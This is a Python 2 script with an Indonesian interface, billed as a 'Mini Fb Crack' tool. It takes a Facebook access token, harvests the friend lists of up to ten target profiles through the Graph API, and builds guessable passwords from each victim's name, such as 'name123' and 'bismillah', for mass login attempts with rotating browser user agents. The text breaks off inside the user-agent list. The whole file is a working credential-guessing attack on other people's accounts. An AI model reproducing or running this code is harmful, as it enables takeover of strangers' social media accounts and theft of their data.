#-*-coding:utf-8-*-
m = '\033[1;91m'
p = '\033[1;97m'
h = '\033[1;92m'
b = '\033[1;96m'
u = '\033[1;94m'
k = '\033[1;93m'
loop = 0
ok = []
cp = []
id = []
pwx = []
host="https://m.facebook.com"
try:
	import os
	import re
	import sys
	import time
	import json
	import random
	import requests
	import importlib
	import subprocess
	from urlparse import urlparse as quote
	from multiprocessing.pool import ThreadPool
	from requests.exceptions import ConnectionError
	from datetime import datetime
except Exception as drong:
	exit(" \033[0;97m[\033[0;91m!\033[0;97m] %s Belum Di Install"%(drong))
s = requests.Session()
ko = random.choice([' Telkontol > ',' Pilih > ',' Input > '])
co = random.choice([' Telkontol > ',' Pilih > ',' Input > '])
kocok = random.choice([' Telkontol > ',' Pilih > ',' Input > '])
nginput = random.choice([ko,co,kocok])
def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.01)
def cek_tokenmu():
	try:
		token = open("token.txt", "r").read()
	except IOError:
		login()
	else:
		try:
			cek = requests.get("https://graph.facebook.com/me?access_token={}".format(token)).json()["name"]
			print (p+' [√] Selamat Datang '+k+cek);time.sleep(2)
		except KeyError:
			print (m+' [!] Tokenmu Mati');time.sleep(1)
			os.system('rm -rf token.txt')
			login()
		except requests.exceptions.ConnectionError:
			exit(raknosinyal)
def banner():
	os.system('clear')
	print ('''
\033[1;94m   ╔╦╗╔╗ ╔═╗  ╔═╗╦╔╦╗╔═╗╦  ╔═╗
\033[1;97m   ║║║╠╩╗║    ╚═╗║║║║╠═╝║  ║╣ 
\033[1;96m   ╩ ╩╚═╝╚═╝  ╚═╝╩╩ ╩╩  ╩═╝╚═╝
\033[1;92m   Mini Fb Crack Simpel Crack!
\033[1;93m ''')
had = ''' [1] Crack Dari ID Teman/Publik
 [0] Exit/Logout/Keluar !
 -------------------------------'''
def crack():
	banner()
	global token
	try:
		token = open('login.txt', 'r').read()
	except IOError:
		print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
		tokenz()
	print ('\033[1;93m -------------------------------\n\033[1;97m  [\033[1;92m#\033[1;97m] Target Min \033[1;97m1 \033[1;97mMaks \033[1;92m10')
	limt = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Berapa Target : ')
	if limt =='':
		print (' \033[1;97m[\033[1;91m!\033[1;97m] Wajib Diisi !')
		crack()
	elif limt == '1':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public : ")
		try:
			lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Berapa Target : ')
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			#,avsid = open("dump1.txt", "a")
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
				#avsid.write(ngentod+'[-]'+tante+'\n')
			#avsid.close()
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID Tidak Ada !')
			exit()
	elif limt == '2':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
	elif limt == '3':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
	elif limt == '4':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
	elif limt == '5':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
	elif limt == '6':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
	elif limt == '7':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
	elif limt == '8':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		idt8 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 8 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt8+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 8 Tidak Ada !')
	elif limt == '9':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		idt8 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 8 : ")
		idt9 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 9 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt8+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 8 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt9+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 9 Tidak Ada !')
	elif limt == '10':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		idt8 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 8 : ")
		idt9 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 9 : ")
		idt10 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 10 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt8+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 8 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt9+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 9 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt10+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 10 Tidak Ada !')
				
				
				
				
	print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID  : \033[0;91m"+str(len(id)))
	ask = raw_input("\n \033[0;97m[*] manual pass?? Y/t /a : ")
	if ask == "Y" or ask == "y":
		manual()
	if ask == "a" or ask == "A":
		manuapi()
	
	def main(user):
		global loop, token
		pwx = []
		sys.stdout.write(
		      '\r \033[0;97m[*\033[0;97m] Cracking %s/%s OK-:%s - CP-:%s ' % (loop, len(id), len(ok), len(cp))
		); sys.stdout.flush()
		try:os.mkdir("results")
		except OSError:pass
		uid,name=user.split("[-]")
		for ss in name.split(" "):
			if len(ss)<3:
				continue
			else:
				if len(ss) == 1 and len(ss) == 2 and len(ss) == 3 and len(ss) == 4 or len(ss) == 5:
					pwx.append(ss+"123")
					pwx.append(ss+"12345")
				else:
					pwx.append(ss+"123")
					pwx.append(ss+"1234")
					pwx.append(ss+"12345")
					pwx.append("12345")
					pwx.append(ss)
					pwx.append("bismillah")
					pwx.append("sayang")
		try:
			for pw in pwx:
				pw = pw.lower()
				ua = random.choice(['Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14',
	'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0',
	'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
	'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
	'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
	'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
	'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
